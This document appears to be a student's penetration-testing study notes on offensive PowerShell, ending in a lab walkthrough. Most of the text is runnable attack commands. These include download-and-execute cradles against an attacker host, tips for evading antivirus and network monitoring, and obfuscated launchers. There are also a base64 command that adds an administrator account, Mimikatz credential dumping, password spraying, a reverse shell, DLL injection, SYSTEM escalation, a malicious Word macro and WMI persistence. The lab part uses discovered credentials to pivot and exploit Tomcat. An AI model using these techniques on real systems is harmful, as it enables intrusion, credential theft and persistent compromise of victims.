Fundamentals

Some Tools:

→ https://github.com/PowerShellMafia/PowerSploit → https://github.com/powershell/powershell

The Powershell CLI

CLI = Command Line Interface

powershell path

"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\<v1.0 = version>"

[Environment]::Is64BitProcess
True

64-bit PowerShell:

C:\wIndows\system32\WindowsPowerShell

32-bit PowerShell:

C:\windows\SysWOW64\WindowsPowerShell

Help Parameter

/? 
-Help
-?

Basic Usage

  • ExecutionPolicy determines which scripts if any, we can run and can easily be disabled with the “Bypass” or “Unrestricted” arguments
powershell.exe -ExecutionPolicy Bypass .\script.ps1
powershell.exe -ExecutionPolicy Unrestricted .\script,ps1

-WindowStyle Hides the Powershell window when used the “hidden” argument

powershell.exe -WindowStyle Hidden .\script.ps1

-Command Is used to specify a Command or Script Block to run.

powershell.exe -Command Get-Process
powershell.exe -Command "& { Get-EventLog -LogName security } "

-EncodedCommand is used to execute base64 encoded scripts or commands

powershell.exe -EncodedCommand $encodedCommand

-NoProfile Dont load any powershell profiles Profiles are essentially scripts that run when the powershell executable is launched and can interfere with our operations.

powershell.exe -NoProfile .\script.ps1

-Version we can use followed by a version number as the argument to downgrade the version of powershell Useful in scenarios where you have landed on a machine with a more recent version and need to downgrade to Version 1.0 or 2.0 to complete certain tasks.

→ Requires that older versions are still installed on the target

powershell.exe -Version 2

Abreviations

-ExecutionPolicy = -ep / -ex
-EncodedCommand = -ec / -enco
-WindowStyle Hidden = -W h / -Wi hi

Get-Help

Similar to linux Man Pages we can use to obtain information related to any function, alias, module or cmdlet that PowerShell is aware of.

To get full help For any cmdlet, which includes detailed information on associated parameters

Get-Help Get-Process -Full

To show examples of a specific cmdlet

Get-Help Get-Process -Examples

To show Help pages online

Get-Help Get-Help -Online

To update the help files

Update-Help

→ https://technet.microsoft.com/en-us/library/cc764318.aspx

Get-Command

it allows us to list all cmdlets, aliases, functions, workflows, filters, scripts and any applications that are available For us to use in PowerShell.

Get-Command -Name *Firewall*

Cmdlets

Command-lets its how we will leverage powershell For our offensive purposes cmdlets are native commands in powershell (we can also create our own)

Typically used to return output to other cmdlets to be then processed via a pipeline (“|”) https://www.petri.com/understanding-the-powershell-pipeline

Get-ChildItem

Returns 4 columns names Mode, LastWriteTime, Length and Name. But we can pipe the output

Get-ChildItem | Format-List *

rather than columns and names as seen in the previous slide, we can return all named properties associated with its objects in a different list-like format

Pipelining

results of all cmdlets output = objects

Get-Process | Sort-Object -Unique | Select-Object ProcessName

like linux we can redirect the output to a file:

Get-Process | Sort-Object -Unique | Select-Object ProcessName > file.txt

Useful Cmdlets & Usage

-Get-Process

list of all processes formatted in a table-like format

Get-Process | Format-List *

To get all of the information (properties) associated with all of the processes

Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path

Further extend to get information about specific processes and paths to their executables

Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path, Id
  • append another property (id)

Alias

Most of the cmdlets have Aliases. example:

Get-ChildItem = list items in a directory = ls (exactly like the linux one)

To find the aliases we can use: Get-Alias

Get-Alias -Definition Get-ChildItem

// dir // gci // ls

Get-WmiObject

Get-WmiObject -class win32_operatingsystem | select -Property *

Get-WmiObject -class win32_operatingsystem | fl *
  • using the Format-List alias “fl”
Get-WmiObject -class win32_service | fl *

detailed list of properties For all services

Get-WmiObject -class win32_service | Sort-Object -Unique PathName | fl PathName

expanding the filter with PathName

Export-Csv

saving the information that we are gathering to a file we can redirect operator (>)

Get-WmiObject -class win32_operatingsystem | fl * | Export-Csv C:\file.csv

// to save to CSV format

Exploring the Registry

cd HKLM:\
// cd is the alias For the Set-Location
cd .\SOFTWARE\Microsoft\Windows\CurrentVersion\
ls

Select-String

Select-String -Path C:\users\user\Documents\*.txt -Pattern pass*

// search For .txt files named pass* in a directory

Get-Content

we can use to display the full content of the file


Get-Content C:\Users\user\Documents\passwords.txt

ls -r C:\users\user\Documents -File *.txt | % {sls -Path $_ -Pattern pass* }
ls -r = alias For "Get-ChildItem"
% = alias For "ForEach-Object"
sls = alias For "Select-String"
$_ = variable For current value in the pipeline

Get-Service

Get us information regarding currently installed services and can be useful in the case we can identify a service which might be vulnerable to a privilege escalation exploit.

Get-Service "s*" | Sort-Object Status -Descending

// all services that start with "s"

Modules

  • Is a set of powershell functionalities grouped together in the form of a single file that will typically have a “.psm1” file extension.

The components that can make up a module:

powershell scripts (.ps1) additional assemblies, help files or scripts module manifest file directory which is used to contain all of the above

Types

script modules:

→ https://docs.microsoft.com/en-us/powershell/scripting/developer/module/how-to-write-a-powershell-script-module?view=powershell-7 binary modules: → https://docs.microsoft.com/en-us/powershell/scripting/developer/module/how-to-write-a-powershell-binary-module?view=powershell-7 manifest modules: → https://docs.microsoft.com/en-us/powershell/scripting/developer/module/how-to-write-a-powershell-module-manifest?view=powershell-7 dynamic modules: → http://go.microsoft.com/fwlink/?LinkId=141554

Get-Module

to obtain a list of all currently imported modules

Get-Module

To list all modules available to us

Get-Module -ListAvailable

Import-Module

modules that we want to use, will first need to be imported into our current powershell session

Import-Module .\module.psm1
  • After importing, all cmdlets of that module is available to us

[+] example PowerSploit = https://github.com/PowerShellMafia/PowerSploit

1 - download the module 2 - we need to copy to one of the module paths specified by the $Env:PSModulePath.

$Env:PSModulePath
// to find these paths

Perhaps the AV will detect the powersploit framework as malicious. its normal. In this case create an exclude directory For your AV software.

3 - extract and copy all of its contents into our chosen module directory into a folder called ‘PowerSploit’ 4 - Import the module

Import-Module PowerSploit
Get-Module

5 - To list all the commands For that module

Get-Command -Module PowerSploit

6 - There are help files For all of the modules

Get-Help Write-HihackDLL

Scripts

.\example.ps1

Param{
	[parameter(mandatory=$true)][string]$file
}
Get-Content "$file"

this script takes a file name as argument For which it creates a variable called “$file”, and runs the “Get-Content” cmdlet on our variable.

.\example1.ps1 users.txt // users.txt contains several usernames, so the script will return the content of the file

Alternatively

	$file="users.txt"
	Get-Content $file

create a variable with the file, then just run getcontent with that variable

Loops Statements

	for()
	foreach()
	while()
	do{something}while()
	do{something}until()

To get more information

Get-Help about_<Foreach, For, Do or While>

Loop Statement / Loop Body

	$services = Get-Service
	foreach ($service in $services) {$service.name}

returns the name of each service with the .name property in the loop body.

Alternatively

	Get-Service | ForEach-Object {$_.name}

using the built-in cmdlets ForEach_Object

Where-Object

allows us to select objects within a collection based on their property values in regard to when used For a loop.

Get-ChildItem C:\Powershell\ | Where-Object {$_.name -match "xls"}

Port scan example [+]


$ports=(444,81);
$ip="192.168.13.250";

foreach ($port in $ports) {try{$socket=New-Object System.Net.Sockets.TcpClient($ip, $port);}

catch{};

	if ($socket -eq $null) {echo $ip":"$port" - Closed";	} else {echo $ip":"$port" - Open";$socket = $null;}}

.\Scan-Ports.ps1

Objects

Get-Process Format-List *
  • Each objects has a multiple methods that we can use to manipulate a particular object.
  • To get a list of methods For objects associated with a cmdlet, we can use get-member
Get-Process | Get-Member -MemberType Method
  1. we have identified an object (in this case, a process firefox) we would like to manipulate in some way using the Get-Process cmdlet
  2. We have determined the methods that are available For use with the objects that were returned by using: 
    Get-Process | Get-Member cmdlet and pipeline
  3. We have decided that the Kill method is the method we would like to use For that process( as an example)
Get-Process -Name "firefox" | Kill

we can call the get-process along with the -Name parameter For the firefox process, and pipe the Kill method that we identified using the get-member cmdlet. This command will kill any firefox processes.

Creating .NET objects

As an example of creating a basic object based off of a .NET class with the “Net-Object” cmdlet, we can use the “Net.WebClient” .NET system class to download a file to a target system with the following code:


$webclient = New-Object System.Net.WebClient
$payload_url = "https://<kali ip>/payload.exe"
$file = "C:\ProgramData\payload.exe"
$webclient.DownloadFile($payload_url, $file)
  • explainning the code - line by line
  1. We create a variable called $webclient which instantiates the System.Net.WebClient .NET class, which is used to create a web client.
  2. We then create another variable $payload_url, which is the url to our payload
  3. The $file variable is then used as the location to which we want to save the payload on the target system
  4. And finally, we call the $webclient variable with the DownloadFile method which downloads our payload.exe to the target.

Offensive PowerShell

Downloading and Execution

  • A summary of methods we can use For In-Memory execution with PowerShell 2.0:
Net.WebClient DownloadString Method
Net.WebClient DownloadData Method
Net.WebClient OpenRead Method
.NET [Net.HttpWebRequest] class
Word.Application COM Object
Excel.Application COM Object
InternetExplorer.Application COM Object
MsXml2.ServerXmlHttp COM Object
Certutil.exe w/ -ping argument
  • A summary of methods we can use For Disk-Based execution with PowerShell 2.0:
Net.WebClient DownloadFile method
BITSAdmin.exe
Certutil.exe w/ -urlcache argument

These two methods are commonly referred to as Download Cradles

From the PowerShell console

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/script.ps1")

//iex = Invoke-Expression

From the cmd.exe

we can run the same command from a stardard windows command prompt:

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://<kali ip>/script.ps1')

powershell.exe iex (New-Object Net.WebClient).DownloadString("http://10.90.60.80:5923/winpeas.exe")
	//note that when executed within cmd.exe we need to use single quotes

Net.WebClient DownloadString Method


$downloader = New-Object System.Net.WebClient
$payload = "http://<kali ip>/script.ps1"
$command = $downloader.DownloadString($payload)
Invoke-Expression $command

Instantiate our System.Net.WebClient class as the $downloader variable Create our $payload variable (URL to the script) Create our $command variable Execute our $command with the Invoke-Expression (iex) cmdlet

Example - Download String

save in Get-ProcessPaths.ps1

Get-Process | Format-List -Property Name, Path

Host in a web server Then:

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Get-ProcessPaths.ps1")
  • The DownloadString method will execute our remote script in the PowerShell process memory, so in regard to not dropping an artifact to disk, its a great way to stay under the radar of endpoint security solutions that are not monitoring powershell memory.

Evasion Tips [+] It should be noted that where possible when hosting your remote PowerShell script, to have an SSL certificate configured on the attacker machine. This helps in evading over-the-wire heuristics as our traffic will go over HTTPS. In the previous examples, we simply used HTTP, which could easily be detected.

Evasion Tips [+] Another trick we can use which might help in evading basic file extension heuristics is to give our Powershell script a different extension, For instance Logo.gif. PowerShell will still execute it as a .ps1 script

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Logo.gif")

Evasion Tips [+] Net.WebClient class allows us to specify a custom user-agent string when sending the request to our attacker URL. This can help us evade detection mechanisms that are flagging on abnormal user-agent strings crossing the wire. We can do that with the Headers.Add method:


$downloader.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36")
	// we can insert that in the second line of our code. Just after declaring the $downloader variable

Example - DownloadFile

This method will download your executable to disk Although noisy and not recommended if trying to remain stealthy, its still sometimes a handy method to quickly download a file to the target system.


$downloader = New-Object System.Net.WebClient
$payload = "http://<kali ip>/payload.exe"
$local_file = "C:\programdata\payload.exe"
$downloader.DownloadFile($payload, $local_file)

Instantiate our System.Net.WebClient class as the $downloader variable payload URL variable local_file variable (will save to this location) Call the object variable with the “DownloadFile” method and our $payload and $local_file variables

  • Executing the file once its on our target system can be accomplished using the call operator (&) and variable we created For the payload ($local_file)
& $local_file

[+]

We can configure the Net.WebClient class methods to use the systems proxy and default credentials


$downloader = New-Object System.Net.WebClient
$payload = http://<kali ip>/script.ps1
$cmd = $downloader.DownloadFile($payload)

$proxy = [Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
$downloader.Proxy = $proxy

iex $cmd

Net.WebRequest

To download and execute scripts on a target, in memory


$req = [System.Net.WebRequest]::Create("http://<kali ip>/script.ps1")
$res = $req.GetResponse()
iex ([System.IO.StreamReader]($res.GetResponseStream())).ReadToEnd()

Instantiate our System.Net.WebRequest class as the $req variable Create a $res variable to store the WebRequest response Use the “Invoke-Expression” alias (iex) to invoke the System.IO.StreamReader and execute our code

It can also be configured to use a proxy we can add this before the iex line


$proxy = [Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
$req.Proxy = $proxy

System.Xml.XmlDocument

Allow us to execute a powershell command or any system command (in memory)


Create a XML file:
<?xml version="1.0"?>
<command>
	<a>
		<execute>Get-Process</execute>
	</a>
</command>

once our xml file is hosted


$xmldoc = New-Object System.Xml.XmlDocument
$xmldoc.Load("http://<kali ip>/file.xml")
iex $xmldoc.command.a.execute

COM Objects

some available


Msxml2.XMLHTTP
Microsoft.XMLHTTP
InternetExplorer.Application
Excel.Application
Word.Application
MsXml2.ServerXmlHttp
WinHttp.WinHttpRequest.5.1 (Not Proxy Aware)

it works the same but the New-Object, with -ComObject parameter


$downloader = New-Object -ComObject Msxml12.XMLHTTP
$downloader.open("GET", "http://<kali ip>/script.ps1", $false)
$download.send()
iex $downloader.responseText
  • We can do the same with WinHttp.WinHttpRequest.5.1 object as well (in the first line)

$downloader = New-Object -ComObject WinHttp.WinHttpRequest.5.1

Tip [+] We can use all these commands as one liners, by using a semicolon (;) to break ip the commands We can save as script too and execute with powershell.exe .\script.ps1 Make sure to include -ExecutionPolicy (-ep) and -Window Hidden (-W h) This will ensure we can run our scripts and that the powershell window stays hidden from the end-user

powershell.exe -ExecutionPolicy bypass -Window hidden .\downloader.ps1

[ extra ] A great tool to craft obfuscated download cradles:

Invoke-CradleCrafter = https://github.com/danielbohannon/Invoke-CradleCrafter

Obfuscation

Invoke-Obfuscation = https://github.com/danielbohannon/Invoke-Obfuscation

- First download
- Then, find the modules paths
   → $env:PSModulePath
	// in this case C:\users\user\Documents\WindowsPowerShell\Modules
	// After extract to this folder
- Import the module
   → Import-Module Invoke-Obfuscation
- Open it
   → Invoke-Obfuscation

We have several options

TOKEN
AST
STRING
ENCODING
COMPRESS
LAUNCHER

SET SCRIPTBLOCK

As an example of a script block we can use a standard Net.WebClient download cradle:

SET SCRIPTBLOCK iex (New-Object Net.WebClient).downloadstring("http://<kali ip>/Get-ProcessPath.ps1")

Type of Obfuscation

STRING

We are presented with several options For that method: 1. Concatenate 2. Reorder 3. Reverse

In this example 3 → 3

we should get a code obfuscated that we can use in the target machine

Encoding

// We are presented with options

  1. Encode as ASCII
  2. Encode as Hex
  3. Encode as Octal
  4. Encode as Binary
  5. Encrypt as SecureString (AES)
  6. Encode as BXOR
  7. Encode as Special Characters
  8. Encode as Whitespace
  • Lets pick 7 - Special Characters, For this example → 7

we should get a highly obfuscated payload

[+] If we are operating from a windows command prompt on the target, instead of powershell. We can use:

powershell -Command "<the same payload>"

// dont forget the quotes in the payloads

If you wanna use another encoding method, use the RESET options to clear previous methods.

Obfuscated launcher

→ LAUNCHER there is a lot of options:

ps
cmd
wmic
rundll
var+
stdin+
clip+
var++
stdin++
clip++
rundll++
mshta++
  1. We SET SCRIPTBLOCK with the code we want to execute
  2. We select an obfuscation method to generate the obfuscated command
  3. We then use the LAUNCHER option at the end of this process

in this case we will choose → RUNDLL

then option 0 - No execution flags → 0

The resulting string, is an obfuscated command that utilizes rundll32.exe with the “SHELL32.DLL” function (ShellExec_RunDLL) which will launch our obfuscated powershell code on the target.

[+] There is an option: tutorial that we can use to get some guidance if we are stuck

Encoded Commands

its not recommended since it can be easily detected by AV and other string heuristics, considering its just a base64 encoding.

-EncodedCommand parameter in powershell it makes complex commands digestible by powershell by encoding everything with Base64.

example


$command = 'net user admin1 "password" /ADD; net localgroup administrators admin1 /add'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

we can get the results of our encoded command with:

 Write-Host $encodedCommand

//copy the payload

then execute on the target:

powershell.exe -encodedcommand <paste the payload>

Information Gathering & Recon

Invoke-Portscan = https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 its included with the powersploit framework

Invoke-Portscan -Hosts "192.168.13.1/24" -PingOnly
Invoke-Portscan -HostFile ips.txt -PingOnly
  • to save the results we can pipe and export-csv 
    Invoke-Portscan -HostFile ips.txt -PingOnly | Export-Csv C:\ping_scan.csv

once we have identified live hosts we can conduct port scans

Invoke-Portscan -HostFile ips.txt -ports "53-81"

Output to .gnmap = NMAP format

Invoke-Portscan -HostFile ips.txt -oG port_scan.gnmap -f -ports "1-81"

For enumerating Files

Get-HttpStatus

Get-HttpStatus -Target 192.168.13.62 -Path dictionary.txt -Port 80 | ? {$_.Status -match "ok"}

Host Discovery with Posh-SecMod framework

Invoke-ARPScan = https://github.com/darkoperator/Posh-SecMod

it may generate fewer alerts than your usual SYN or TCP scan

Invoke-ARPScan -CIDR 192.168.13.1/24

Get-Command -Module Posh-SecMod // to view the available options

Invoke-ReverseDnsLookup -CIDR 192.168.13.0/24
Get-Help Resolve-HostRecord -Examples
Get-Help Resolve-DNSRecord -Examples

Post-Exploitation with PowerShell

post-exploitation framework Nishang = https://github.com/samratashok/nishang

// as always, download the framework and host with a web server

  • Nishang

Copy-VSS module

will attempt to copy the SAM database using VSS service, and if run on a domain controller, will try and copy the NTDS.dit and contents of the system registry hive.

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Copy-VSS.ps1"); Copy-VSS

Get-Information

get a lot of system information

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Get-Information.ps1"); Get-Information

Get-PassHints

we can use to dump the saved password hints For users on the system:

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Get-PassHints.ps1"); Get-PassHints

Invoke-Mimikatz

Will dump clear-text credentials or hashes from memory.

iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds

There is plenty more in Nishang gather modules moreover = https://github.com/samratashok/nishang#gather

Invoke-BruteForce

We can use this to brute force Active Directory accounts, SQL Server, Web or FTP servers. Invoke-BruteForce is great tool For executing a password spray attack against Active Directory Just ensure that your password list contains a single password.

→ Get-Help Invoke-BruteForce

Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\temp\users.txt -PasswordList C:\temp\pwds.txt -Service ActiveDirectory -StopOnSuccess -Verbose

Reverse Shell - Invoke-PowerShellTcp

provides a way to obtain a reverse PowerShell from our target host back to a netcat listener the traffic is traversing the wire in cleartext between attacker and target. although a great and undetected by AV method to get a reverse shell from PowerShell, over-the-wire (SIEM) may pick up some chatter if that type of solution has been implemented within an organization.

  • Open a listener in the attacker:
nc -lvnp 4444
  • Execute the command in the target to grab the file and get the reverse shell:
powershell.exe -Command iex (New-Object Net.WebClient).DownloadString("http://<kali ip>/Invoke-PowerShellTcp.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress <kali ip> -Port 4444
  • There is a lot more shells available in Nishang framework. // bind, reverse, ICMP, UDP, RAT, etc 
    Invoke-JSRatRegsvr.ps1
Invoke-JSRatRundll.ps1
Invoke-PoshRatHttp.ps1
Invoke-PoshRatHttps.ps1
Invoke-PowerShellIcmp.ps1
Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcpOneLine.ps1
Invoke-PowerShellTcpOneLineBind.ps1
Invoke-PowerShellUdp.ps1
Invoke-PowerShellUdpOneLine.ps1
Invoke-PsGcat.ps1
Invoke-PsGcatAgent.ps1
Remove-PoshRat.ps1
  • Nishang has other categories modules as well:
ActiveDirectory
Antak-WebShell
Backdoors
Bypass
Client
Escalation
Execution
Gather
MITM
Misc
Pivot
Prasadhak
Scan
Shells
Utility
  • PowerSploit

Tools For post-exploitation:

AntivirusBypass
Code Execution
Exfiltration
Mayhem
Persistence
Privesc
Recon
ScriptModification

PowerUp

its a module within the Privesc Category we can first import the Privesc module from within the Privesc modules directory and have a look at some of the options we have:

C:\Modules\PowerSploit\Privesc> Import-Module .\Privesc.psm1
Get-Command -Module Privesc
  • Invoke-AllChecks: // will run all functions related to the Privesc module looking For misconfigurations, permissions issues with services, opportunities For DLL hijacking a number of other useful checks.

// We can invoke it on the target after we have imported the Privesc.psm1 module with the “Invoke-AllChecks” command.

C:\Modules\PowerSploit\Privesc> Invoke-AllChecks

The output will also indicate an AbuseFunction we can use to further exploit the target. In this case, PowerUp identified a potential service binary we can install with the “Install-ServiceBinary -Name ‘ClickToRunSvc’ command”

PowerSploit - Save to HTML

the file will be saved in the current directory MACHINENAME.USERNAME.html

Invoke-AllChecks - HTMLReport

CodeInjection category

we can inject our own code into existing processes on the target system, whether it be via DLL injection, injecting our own custom Shellcode into an existing process, or using WMI to execute commands on the target.

Invoke-DLLInjection

this function injects an attacker-defined DLL into any existing process ID on the target system.

msfvenom -p windows/exec CMD="cmd.exe" -f dll > cmd.dll

open a web host: grab the file:

iex (New-Object Net.Webclient).DownloadFile('http://<kali ip>/cmd.dll', 'C:\programdata\cmd.dll')
  • Identify a process on the target system we would like to inject our DLL into.
ps | ? {$_.ProcessName -match "notepad"}
  • After grabbing the PID of the choosen process We can grab the Invoke-DLLInjection and execute it to inject our malicious dll in the PID of the process
iex (New-Object Net.Webclient).DownloadString('http://<kali ip>/Invoke-DLLInjection.ps1'); Invoke-DLLInjection -ProcessID 7420 C:\programdata\cmd.dll
  • once that in complete, we can run “ps” command again, to confirm that we have a “cmd” process which has been spawned from our DLL injection operation, which is created in a new process thread.
ps | ? {$_.ProcessName -match "cmd"}

More about DLL injection

http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
  • psgetsystem

// another tool

https://github.com/decoder-it/psgetsystem

psgetsystem allows us to get SYSTEM privileges via a parent process, which then spawns a child process which effectively inherits the SYSTEM access privileges of the parent. Although this tool needs to be run as Administrator, its a great way to evade application whitelisting solutions by being to inject ourselves into an already signed or other trusted process.

After send the script to the target

	. .\psgetsys.ps1
	[MyProcess]::CreateProcessFromParent(<system_id>, "<Command to execute>")
  • First we need to identify some SYSTEM processes
Get-Process -IncludeUserName | Where-Object {$_.UserName -match "SYSTEM"} | Format-List -Property Username,Name,Id

This should return a list of all SYSTEM-owned processes along with their PIDs and process names. in this case we will use ZeroConfigService

  • This will launch a cmd.exe prompt, but as a child process of the SYSTEM-owned ZeroConfigService.exe process, and as a result, our child process, will also be SYSTEM.
	. .\psgetsys.ps1
	[MyProcess]::CreateProcessFromParent(3632,"cmd.exe")

we can confirm this by running a tool like Process Explorer, to see that our cmd.exe process has been spawned as a child process of the ZeroConfigService process and is also SYSTEM.

of course, in an attack scenario, we could launch a meterpreter executable payload as SYSTEM and get a SYSTEM shell from the target machine.

  • Empire

    https://github.com/EmpireProject/Empire

Another post-exploitation framework Its main advantage is that is implements powershell functionality without requiring the existence of powershell on a target machine.

Powershell and Metasploit

set a handler in meterpreter make a payload in msfvenom = -f psh-reflection > payload.ps1 make a web host to send the payload to the target

	python -m http.server

grab the file in the target machine:

powershell iex (New-Object Net.Webclient).DownloadString('http://<kali ip>/payload.ps1')

once we execute the download cradle, we will receive the meterpreter session already

in meterpreter session:

load powershell
help = to show the options we have
powershell_shell

Get-Process | Where-Object {$_.ProcessName -match "iTunes"}

back to meterpreter:

powershell_execute 'iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz'

it has the advantage that operates in the powershell memory, helping us to stay undetected.

sending Empire session to Metasploit

in msfconsole: exploit/multi/script/web_delivery set srvhost = kali ip set lhost = kali ip set target 2 = PSH *powershell run copy the URL of the payload

in Empire: usemodule powershell/cpde_execution/invoke_metasploitpayload info set URL set Agent 65CY4XEG execute // Now it should open a session in metasploit

Empire Overview

Install

  • https://github.com/EmpireProject/Empire
git clone <url>
cd Empire > cd setup > ./install.sh

Handlers

listeners
help
uselistener
userlistener <option of choice>
info = to show options

config to use SSL

cd /root/tools/Empire/setup/
./cert.sh

in Empire: set CertPath /root/tools/Empire/data execute = run/exploit (metasploit) back = same as (metasploit)

BindIP = lhost (metasploit) Port = lport (metasploit)

  • Verify listeners now our listener should appear

set Stager

usestager = it will show the options
usestager multi/launcher
info = to show options
set Listener http
execute
copy the payload to execute in the target machine

Agents

After executing the payload in the target, we should have an agent in Empire = same as session in metasploit

agents = it will show the open session
help
interact <tab> choose an option = same as session -i <number> (metasploit)

In Empire Session

help = always to show the available options
info = same as sysinfo (metasploit)
shell = to use commands

shell whoami
shell whoami /GROUPS
usemodule
searchmodule checks

usemodule privesc/powerup/allchecks
execute

Client side attack

main = to come back to the main menu
usestager windows/macro
info
set Listener http
set OutFile root/tools/Empire/data/macro
execute

the macro code will be save in that directory we can copy-paste the macro to a word document make sure that you enable developer tab For your version of microsoft word alt+f11 = to open the visual basic copy the payload to the editor save the file .doc

as the result of the macro execution in the target machine, we get a session in Empire

UAC Bypass PowerShell Exploit Script Walkthrough

  • Identify the program that which auto elevates to a high integrity process, which naturally bypass UAC in a sense.
  • Identify that the program checks For registry keys and values which are writable by us
  • and its responsable to associate file types of the msi extension to a specific application
  • we also hijack that process, to launch a command of our choosen, which was the calculator program.

Introduction to Leveraging WMI and Methods For Persistence

Get-WmiObject
Get-Help Get-WmiObject
Get-Help wmi

Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace"
Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace" | Select-Object Name
Get-WmiObject -Namespace "root/cimv2" -List | Where-Object {$_.Name -Match "Win32_Service"}
Get-WmiObject -Class Win32_Service | Where-Object {$_.State -Match "Running"}
Get-WmiObject -Class Win32_Service | Where-Object {$_.Name -Match "Defend"}
Get-WmiObject -Class Win32_Process -List
Get-WmiObject -List Win32_Process | Get-Member -Membertyoe Method


$proc = Get-WmiObject -List Win32_Process
$proc.Create("cmd.exe")

this should launch cmd.exe as a child process from WmiProvider

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList cmd.exe

// Also will generate a process as a child from the WmiProvider

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList cmd.exe -ComputerName <ip> -Credential <user>

Get-WmiObject -Class Win32_Process -Filter {ProcessId ="2512"} -Computername <ip> -Credential <user>

Get-WmiObject -Class Win32_Process -Filter {ProcessId ="2512"} -Computername <ip> -Credential <user> | Remove-WmiObject

// if we want to kill the process remotely

PowerLurk

https://github.com/Sw4mpf0x/PowerLurk

  • make a payload in msfvenom
  • send to the target machine via python web server host
  • open a handler in metasploit
  • download the PowerLurk.ps1 from github
  • execute this command to grab the PowerLurk file and trigger with a program, in this case the calc.exe. // Everytime the target execute the calculator our payload will be executed.
iex (New-Object Net.WebClient).DownloadString('http://<kali ip>/PowerLurk.ps1'); Register-MaliciousWmiEvent -EventName CalcExec -PermanentCommand "cmd.exe /c C:\programdata\payload.exe" -Trigger ProcessStart -ProcessName calc.exe
  • To view our malicious WMI Event
iex (New-Object Net.WebClient).DownloadString('http://<kali ip>/PowerLurk.ps1'); Get-WmiEvent -Name CalcExec

now its up to the target user, to open the calculator it will trigger the reverse shell back to our kali

if you wanna Remove the Malicious WMI Event

iex (New-Object Net.WebClient).DownloadString('http://<kali ip>/PowerLurk,ps1'); Get-WmiEvent -Name CalcExec | Remove-WmiObject

Lab 1 - Leveraging PowerShell During Exploitation

organization - 172.16.80.0/24 172.16.80.1 172.16.80.100 tester ip = 175.12.80.0/24

# my ip 175.12.80.10 # 172.16.80.1 172.16.80.100 135 139 445 4983

we can access in browser or by nc


172.16.80.100:4983 or nc 172.16.80.100 4983
@echo off  net use "\\10.100.11.150\C$" /user:local_admin P@ssw0rd123  if exist "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" (      echo "Copying errors..."      copy "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\      del "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" ) else (      echo "No errors!" )  net use "\\10.100.11.150\C$" /delete
  • we discovered a new ip and credentials
10.100.11.150
local_admin:P@ssw0rd123

now that we have credentials, lets smbexec into it

johnkali)-[/opt/impacket/examples]
└─$ sudo python3 smbexec.py 'local_admin:P@ssw0rd123'@172.16.80.100 

	ipconfig
	echo %userdomain%


powershell -c iex (New-Object Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload2.exe', 'C:\Windows\Temp\payload.exe')
  • after some time configuring Empire
sudo powershell-empire server
sudo powershell-empire client

in Empire:

listeners uselistener http info set Host execute main

usestager multi/launcher set listener http execute

copy the payload and execute into the first shell from smbexec // we should get a shell back from Empire = they call this agent

agents interact // its the same as session -i from Metasploit

usemodule situation_awareness/network/arpscan set CIDR 10.100.11.0/24 set Agent execute

  • we discovered 2 hosts: 100 e 101
	MAC               Address      
---               -------      
00:50:56:A0:4F:BC 10.100.11.1  
00:50:56:A0:13:FF 10.100.11.100
00:50:56:A0:53:98 10.100.11.101
00:50:56:A0:53:98 10.100.11.255

now lets search for open ports

usemodule powershell/situational_awareness/network/portscan set Hosts 10.100.11.100 = ip of the target found set Agent execute

Hostname      OpenPorts       
--------      ---------       
10.100.11.100 445,139,135,8443

Passing the session to Metasploit, because we will need to do some Pivot

In Metasploit:

use exploit/multi/script/web_delivery
set target 2 = powershell
set SRVHOST <kali ip>
set payload windows/meterpreter/reverse_tcp
set lhost <kali ip>
exploit -j
copy the URL

in Empire:

usemodule code_execution/invoke_metasploitpayload
set URL <the URL from metasploit module>
set Agent <agent number>
execute

here, we should get a meterpreter session

in Metasploit: we are dealing with different networks, so we will need to set an autoroute

use post/multi/manage/autoroute
set session 1
run

use auxiliary/server/socks_proxy
set srvhost <kali ip>
run

remember the port must be the same as proxychains.conf file now we can set our browser, in the proxy config, in the socks session, set the kali ip with the right port we can open the page 10.100.11.100:8443 from that weird port that was open a apache tomcat 7.0.81 page opens, if we search For vulnerability For that version of apache

  • we get CVE-2017-12617 metasploit has this exploit, but first we need to set a proxy

  • why do we need to set a proxy? because its a internal network, we got set the proxy, For the target of the internal network can receive our payload

use post/windows/manage/portproxy
set CONNECT_ADDRESS <kali ip>
set CONNECT_PORT 4444
set LOCAL_ADDRESS 10.100.11.101 = its the first host we compromise.
set LOCAL_PORT 4444
set session 1
run

use exploit/multi/http/tomcat_jsp_upload_bypass
set options
set payload java/jsp_shell_reverse_tcp
